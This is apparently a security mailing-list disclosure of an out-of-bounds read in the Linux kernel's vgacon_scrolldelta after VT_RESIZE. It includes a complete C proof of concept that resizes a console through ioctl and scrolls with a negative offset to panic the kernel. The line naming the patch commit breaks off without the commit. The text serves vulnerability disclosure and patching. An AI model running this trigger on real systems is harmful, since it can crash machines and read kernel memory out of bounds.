Date: Wed, 16 Sep 2020 16:19:46 +0800
From: NopNop Nop <>
Subject: Linux Kernel: out-of-bounds reading in vgacon_scrolldelta


We found an out-of-bounds reading in vgacon_scrolldelta. This BUG is caused
by "soff" being negative after VT_RESIZE.

Our PoC (panic with CONFIG_KASAN=y):

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/ioctl.h>
#include <fcntl.h>

int main(int argc, char** argv)
{
        int fd = open("/dev/tty1", O_RDWR, 0);

        /* 0x5609 is VT_RESIZE; size is {rows, cols, scrollsize} */
        unsigned short size[3] = {4, 0x254, 0};
        ioctl(fd, 0x5609, size);

        for (int i = 0; i < 110; i++) {
                write(fd, "\x0a", 1);
        }

        /* 0x541c is TIOCLINUX; subcode 13 scrolls the console */
        signed int args[3] = {13, -0x400, 0};
        ioctl(fd, 0x541c, args);
}

Here is the commit to patch this BUG:

